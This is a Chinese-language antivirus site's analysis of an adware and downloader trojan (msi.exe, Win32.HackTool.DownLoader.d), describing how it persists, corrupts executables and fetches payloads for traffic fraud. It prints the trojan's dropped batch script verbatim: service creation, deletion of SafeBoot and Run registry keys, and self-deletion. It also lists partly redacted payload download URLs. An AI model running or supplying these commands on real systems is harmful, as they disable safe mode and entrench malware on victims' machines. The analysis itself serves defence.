杀毒联盟帮你提供最完美的电脑病毒资讯网站Rss 2.0

今天是:

 杀毒联盟提供病毒资讯致力做中国最专业的网络学院! [设为首页]  [加入收藏]  [联系我们]
| 网站首页 | 病毒预警 | 最新病毒 | 业界新闻 | 系统进程 | 安全防御 | 解决方案 | 你问我答 |
您现在的位置: 杀毒联盟 >> 最新病毒 >> 正文 知识在于积累,成功在于努力。---杀毒联盟
msi.exe破坏型广告刷子61440,Win32.HackTool.DownLoader.d.61440
杀毒联盟 www.shaduu.com 杀毒很难,防毒很简单,shaduu帮您成为防病毒高手为您提供技术信息   

          ★★★   作者:佚名    文章来源:互联网整理    点击数:    更新时间:2008-7-19 9:14:05 添加到百度搜藏 添加到百度搜藏 【字体:

msi.exe破坏型广告刷子61440,Win32.HackTool.DownLoader.d.61440是一个广告木马程序。它自带有一个网址库,会引导用户的IE浏览器自动登录这些网址,帮它们刷流量。同时它还能破坏系统的安全模式,阻止用户查杀它。

1. 修改自身属性为只读隐藏 系统。
2. 将病毒母体拷贝到%windir%下和%windir%\system32下,,并命名随机名称A 和随机名B 。
3. 获取系统分区的驱动器所在分区的前3个字符,连接Documents and Settings\All Users\「开始」菜单\程序\启动\,创建一随机名C的快捷方式,指向%windir%下的病毒母体,并创建一随机名C的批处理文件,里面写入:
REM OL0ZEIU0W6QXEXO0177NSU19VCPCQXAOGWS1LB0S1YSW2JBL
NJ7XT
sc.exe create 5QINP2MGCV BinPath= "C:\WINDOWS\5QINP2MGCV.exe -7ZK55JU0JJG6" type= own type= interact start= auto DisplayName= NPWPS9U3
sc.exe description 5QINP2MGCV 用以管理H8Q4J54ZGH8R69H
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\ SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ {4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\ Control\SafeBoot\Network\ {4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F sc.exe create A02AWXB66D BinPath= "C:\WINDOWS\system32\ A02AWXB66D.exe -LXCU5QYM" type= own type= interact start= auto DisplayName= 5A3VBS0Bsc.exe description A02AWXB66D FFOLG8Z4YQRG6Idel %0
exit
运行该批处理,会创建2个服务来分别启动病毒在%windir%和%windir%\system32下的2个备份.并删除安全模式的注册表项,最后删除批处理自己。
4. 释放自身资源到%windir%下取名为随机名称D连接上msi.exe,设置属性为隐藏 系统 只读并运行。
5. 获取当前窗口的CLASS对比是不是"Internet Explorer _TridentDlgFrame" 是发送 WM_CLOSE WM_NCDESTROY 来关闭销毁窗口,不是则找"#32770"获取标题,若发现"任务管理器" "服务器正在" "cript" "://" ":\" "内存" "rror" "安" "错" 发送 WM_CLOSE WM_NCDESTROY来关闭销毁窗口,"internet explorer"例外。
6.资源释放的文件运行后,会遍历非C 盘以外的所有exe com scr文件找到后读取他的图标资源 ,保存并将自身8000字节大小的数据直接写入正常文件,破坏原来的文件。
7. 资源释放的文件运行后,会在以下列表中随机下载一个到%windir%,并解密还原成可执行文件,并运行。
http://122.xxx.9.151/kills.txt? XDW3OCUX.exe.v
http://lmok1234xing.w239.xxxxx.cn/kills.txt?t3= XDW3OCUX.exe.v
http://baiduasp.web194.xxxxx.cn/kills.txt?t4= 不能下
http://www.xxxxx.com/kills.txt?t5= IARL84Y.exe.v
8. XDW3OCUX.exe.v读取自身的141资源,并解密,
主要是解密出刷网站的地址列表的下载地址,
http://lmok1234xing.w239.xxxxx.cn/rouhostsip2008.txt
http://baiduasp.web194.xxxxx.cn/rouhostsip2008.txt
http://122.xxx.9.151/rouhostsip2008.txt
随机选择一个读取并拼接来刷流量。


免责声明:本网转载内容均注明出处,转载是出于传递更多信息之目的,并不代表我们立场。

  • 上一篇病毒:

  • 下一篇病毒:
  • 赞 助 商
     
    频 道 最 新
    · Hacker.com.cn.exe jiejie下载器4096 Win32
    · HBKernel32.sys HBYY.dll SelfDel.bat  HB网
    · Worm.Brontok.a.98816
    · Win32.Troj.VB.286792
    · 大话西游盗号木马73728 Win32.PSWTroj.Maga
    · %a.exe smssb.exe奸商修改器 Win32.troj.pr
    · 破坏TesSafe.sys  地下城盗贼102400 Win32.
    · 6AECFF9B.cfg 6AECFF9B.dll aecff9.sys 大话
    · dp1.fne Exmlrpc.fne Prstgressep11.exe 黑
    · 6AECFF9B.cfg 6AECFF9B.dll aecff9.sys 大话
    · Prstgressep11.exe 黑客远程控制器765465 W
    · 今日预警“灰鸽子变种FB(Backdoor.Win32.G
    · ED.exe Pierce.exe变形虫下载器143360 Win3
     
    相关文章
    如何手动杀新病毒
    使用木马专家查杀木马的相关技巧
    教你如何拒绝木马读取你的硬盘文档
    rav.exe,ressdt.exe,ressdt.sys延迟下载器8
    china_login.mpr,mppds.dll,mppds.exe,wow.
    周鸿祎"食言"涉足杀毒软件称永远免费
    旧金山市政府电脑因员工窜改密码瘫痪
    电信骨干网DDoS攻击防护解决方案
    奥运在即 中国黑客引发担忧
    美国旧金山市政府遭遇"网络政变"